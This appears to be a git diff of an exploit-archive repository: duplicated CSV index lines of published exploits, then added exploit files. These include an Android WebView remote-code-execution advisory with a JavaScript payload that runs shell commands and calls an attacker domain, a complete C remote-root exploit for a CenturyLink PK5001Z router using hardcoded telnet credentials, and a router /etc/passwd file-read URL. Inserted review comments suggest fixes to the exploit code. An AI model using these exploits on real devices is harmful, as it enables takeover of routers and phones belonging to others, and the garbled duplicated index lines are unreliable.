42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0 42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0 42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0
42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0 42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
42317,platforms/php/webapps/42317.txt,"WordPress Plugin Sabai Discuss - Cross-Site Scripting",2017-07-12,"Hesam Bazvand",php,webapps,0
42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0 42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0 42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0 42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
@ -38370,7 +38382,9 @@ id,file,description,date,author,platform,type,port
42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0 42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
42348,platforms/php/webapps/42348.txt,"Tilde CMS 1.01 - Multiple Vulnerabilities",2017-07-20,"Raffaele Forte",php,webapps,0
42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
42352,platforms/hardware/webapps/42352.txt,"VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass",2017-07-20,Viktoras,hardware,webapps,0
42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0 42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0
42358,platforms/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps,0 42358,platforms/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps,0
42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0 42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
@ -38389,6 +38403,7 @@ id,file,description,date,author,platform,type,port
42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
42410,platforms/php/webapps/42410.txt,"JoySale 2.2.1 - Arbitrary File Upload",2017-08-01,"Mutlu Benmutlu",php,webapps,0
42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0 42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
@ -38416,6 +38431,8 @@ id,file,description,date,author,platform,type,port
42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
42450,platforms/hardware/webapps/42450.php,"AirMaster 3000M - Multiple Vulnerabilities",2017-08-12,"Mr.8Th BiT",hardware,webapps,0
42452,platforms/php/webapps/42452.py,"RPi Cam Control < 6.3.14 - Remote Command Execution",2017-08-14,"Alexander Korznikov",php,webapps,0
42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0 42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0 42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0
42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0 42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
@ -38449,6 +38466,7 @@ id,file,description,date,author,platform,type,port
42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42516,platforms/php/webapps/42516.txt,"iTech Movie Script 7.51 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
@ -38472,6 +38490,7 @@ id,file,description,date,author,platform,type,port
42573,platforms/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42573,platforms/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0 42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
42577,platforms/php/webapps/42577.txt,"CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities",2017-06-01,Kaimi,php,webapps,0
42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0 42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0 42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0 42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
@ -38485,6 +38504,7 @@ id,file,description,date,author,platform,type,port
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0 42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0 42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0 42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
42595,platforms/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,php,webapps,0
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
@ -38568,6 +38588,7 @@ id,file,description,date,author,platform,type,port
42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0 42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0 42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0 42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
42732,platforms/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,hardware,webapps,0
42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0 42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0 42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
42736,platforms/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 42736,platforms/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
@ -38625,3 +38646,4 @@ id,file,description,date,author,platform,type,port
42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0 42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0
42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0 42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0 42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
42947,platforms/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,hardware,webapps,0


@ -0,0 +1,132 @@
# Exploit Title: Australian Education App - Remote Code Execution
# Date: 30/Jun/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser2.com
# Software Link: See APK archive websites
# Screenshot: Refer to https://www.youtube.com/watch?v=_DCz0OqJzBI
# Version: v6
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
Australian Education App - Remote Code Execution (No MITM Required!)
Version affected: v6
App Info: The Android application reviewed, according to the developer, comes with all the benefits of "privacy" and "secure browsing", and special configuration for the Australian Education Industry.
External Links:
https://play.google.com/store/apps/details?id=a1.bestsafebrowser2.com
Credits: MaXe (@InterN0T)
Special Thanks: no1special
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution attacks. This is caused by the following lines of code within the
\a1\bestsafebrowser2\com\main.java file: (Lines 133 - 140)
public static String _activity_create(boolean bl) throws Exception {
main.mostCurrent._activity.RemoveAllViews();
Common.ProgressDialogShow(main.mostCurrent.activityBA, "Attempting to access the Internet");
new Phone();
Object object = mostCurrent;
_googleurl = "http://www.tsearch.com.au";
main.mostCurrent._activity.LoadLayout("Start", main.mostCurrent.activityBA);
object = main.mostCurrent._activity;
and
Lines 444 - 450:
public static String _tr_tick() throws Exception {
...
object = main.mostCurrent._webviewextras1;
WebViewExtras.clearCache((WebView)main.mostCurrent._webview1.getObject(), true);
object = main.mostCurrent._webviewextras1;
WebViewExtras.addJavascriptInterface(main.mostCurrent.activityBA, (WebView)main.mostCurrent._webview1.getObject(), "B4A");
object = main.mostCurrent._webview1;
object2 = mostCurrent;
object.Loadproton-Url(_googleurl);
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker registers the domain "tsearch.com.au" (it is currently NOT registered) and creates a DNS record for "www.tsearch.com.au" then the attacker has full control over anyone who installs and runs this app. This vulnerability can be used to execute arbitrary Java code in the context of the application.
In addition to the above, in case someone has registered "tsearch.com.au", then if an attacker performs a MITM attack against "www.tsearch.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.tsearch.com.au", then the attacker can also abuse this vulnerability.
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
-:: Proof of Concept ::-
A successful attack that makes "www.tsearch.com.au" serve the following code:
<script>
function execute(cmd){
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a1.bestsafebrowser2.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.tsearch.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
private void exposeJsInterface() {
if (VERSION.SDK_INT < 17) {
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
} else {
addJavascriptInterface(Object, "EVENT_NAME_HERE");
}
}
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: Australian Education App_vv6.apk
File size: 16,409,964 Bytes
md5: 86b4fab4328a2c4e54db6f1d378b7bb9
sha1: 9786bb89fcfff756d10588bf9a3a9c7439dcc74e
sha256: 2420a3067ba1b120b09ea8737fe8c822b6fea7dd7d860abb84a41611a1f0f7ed
App Name: Australian Education App
Package Name: a1.bestsafebrowser2.com
Package Version: v6
:)
=== EOF ===
Video demo:
https://www.youtube.com/watch?v=_DCz0OqJzBI
FULL POC Archive:
https://mega.nz/#!NOp20DZB!mogOpSCFltdEvAVwshgZV-IPvU1ucNvud68DBDCHRD0
The following is the timeline:
29 June 2017 - Vendor is notified.
29 June 2017 - Vendor pulls apps from app store and files privacy and trademark complaints with YouTube. Vendor does not intend to fix vulnerabilities.
30 June 2017 - All disclosure websites notified, including Exploit-DB.
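Review bot: The manifest change in the Solution section raises `minSdkVersion`, but the rule that only `@JavascriptInterface`-annotated public methods are reachable from JavaScript applies to apps that target API 17 (JELLY_BEAN_MR1) or higher, and the manifest line quoted in the advisory sets `android:targetSdkVersion="14"`; the recommendation should be to raise `targetSdkVersion` to 17 or above (raising `minSdkVersion` alone only limits which devices can install the app). The `exposeJsInterface()` snippet also does not compile as written: `addJavascriptInterface(Object, "EVENT_NAME_HERE");` passes the type name `Object` where an instance of the bridge class is expected, and the method is an instance method of `WebView`, so it should read along the lines of `webView.addJavascriptInterface(bridge, "EVENT_NAME_HERE");` with the bridge's exposed methods annotated `@JavascriptInterface`. Finally, the "Instead the following code should be used" snippet (`WebView webView = new WebView(this); setContentView(webView); ...`) only constructs a WebView and does not show the alternative it is meant to illustrate; it should be completed or removed.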

platforms/hardware/remote/42355.c Executable file

@ -0,0 +1,146 @@
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */
/* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown */
/* uid=0(root) gid=0(root) */
/* # */
/* */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#define END_STRING "chau\n"
#define COMPLETE_STRING "fin-respuesta"
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL SO_NOSIGPIPE
#endif
#define perro(x) \
{ \
fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x, \
strerror(errno)); \
exit(1); \
}
void send_root(int sock, int pid) {
char buf[1024] = {0};
char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";
char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a";
char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";
char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getal, strlen(getal) + 1, 0) < 0)
perro("send");
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getap, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getap, strlen(getap) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrl, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrp, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
perro("send");
sleep(2);
}
void send_cmd(int sock, int pid) {
char str[1024] = {0};
while (fgets(str, 1024, stdin) == str) {
if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
break;
if (send(sock, str, strlen(str) + 1, 0) < 0)
perro("send");
}
kill(pid, SIGKILL);
}
void sys_info(int sock, int pid) {
char buf[1024] = {0};
char sysinfo[1024] = "\nuname -a; id;\n";
if (strncmp(sysinfo, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
perro("send");
sleep(1);
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
kill(pid, SIGKILL);
}
void receive(int sock) {
char buf[1024] = {0};
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
printf(" --oxagast\n");
exit(1);
}
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == -1)
perro("socket");
struct in_addr server_addr;
if (!inet_aton(argv[1], &server_addr))
perro("inet_aton");
struct sockaddr_in connection;
connection.sin_family = AF_INET;
memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
connection.sin_port = htons(23);
if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) !=
0)
perro("connect");
sleep(1);
int pid_root, pid_sys, pid_shell;
sleep(1);
send_root(sock, pid_root);
if (pid_shell = fork())
sys_info(sock, pid_sys);
if (pid_shell = fork())
send_cmd(sock, pid_shell);
else
receive(sock);
return (0);
}
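Review bot: `pid_root` and `pid_sys` are declared in `main()` but never assigned before being passed to `send_root()` and `sys_info()`, and `sys_info()` ends with `kill(pid, SIGKILL)` on that indeterminate value: reading it is undefined behaviour, and `kill()` with a pid of 0 signals the caller's whole process group while -1 signals every process the caller is allowed to signal, so the wrong processes can be killed. The receive loops in `sys_info()` and `receive()` (`while (filled = recv(sock, buf, 1024 - 1, 0))`) treat a -1 error return as "data received" and then execute `buf[filled] = '\0';`, writing one byte before the array; the loop condition should be `> 0`. The `if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0) ;` statements in `send_root()` and `sys_info()` have empty bodies and can be deleted, and the `#define MSG_NOSIGNAL SO_NOSIGPIPE` fallback substitutes a `setsockopt()` option constant for a `send()` flag (the macro is never used, so it should go as well).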


@ -0,0 +1,19 @@
# Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0
1. Description
Any user who can login into the router can exploit the Local File Inclusion
reading files stored inside the device.
2. Proof of Concept
Login into the router and use the path of a file you want to read as
getpage parameter. For example:
http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
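Review bot: The Description should state up front that the issue is post-authentication ("Any user who can login into the router") and that what the PoC demonstrates is an arbitrary file read through the `getpage` parameter of `/cgi-bin/webcm`, not inclusion of a file into executed code, so "Local File Inclusion" in the title overstates the class; "Authenticated Arbitrary File Read" would match what is shown. The `# Date: 2-05-2017` field is in an ambiguous day-month order; the entries in this commit's files.csv use ISO `YYYY-MM-DD`, and the header should follow the same convention.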


@ -0,0 +1,136 @@
#Uniview NVR remote passwords disclosure
#Author: B1t
# The Uniview NVR web application does not enforce authorizations on the main.cgi file when requesting json data.
# It says that you can do anything without authentication, however you must know the request structure.
# In addition, the users' passwords are both hashed and also stored in a reversible way
# The POC below remotely downloads the device's configuration file, extracts the credentials
# and decodes the reversible password strings using my crafted map
# It is worth mention that when you login, the javascript hashes the password with MD5 and pass the request.
